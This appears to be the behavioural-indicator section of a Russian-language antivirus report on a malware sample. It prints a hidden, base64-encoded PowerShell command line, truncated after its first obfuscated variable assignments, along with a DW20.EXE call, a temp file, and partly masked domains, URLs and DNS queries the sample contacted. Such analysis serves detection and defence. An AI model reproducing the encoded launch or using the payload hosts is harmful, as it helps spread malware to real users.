Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enco JABYAG0AbQB0AHEAYQB0AGMAZQB4AG0AcwBwAD0AJwBVAGwAcQB1AHoAegB1AHUAagBvAGkAeQAnADsAJABKAGMAZQBpAGQAcQByAGwAagBqAHcAdgAgAD0AIAAnADUAOAA5ACcAOwAkAFcAawByAGcAcwBqAHQ...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1616
- %TEMP%\803217.cvr
- 'su##dom.fr':443
- 'ea######istics-hk.com.hk':80
- http://ea######istics-hk.com.hk/wp-admin/css/F/
- 'su##dom.fr':443
- DNS ASK on###urs.net
- DNS ASK lu##c.cn
- DNS ASK pr###rgrass.com
- DNS ASK su##dom.fr
- DNS ASK ea######istics-hk.com.hk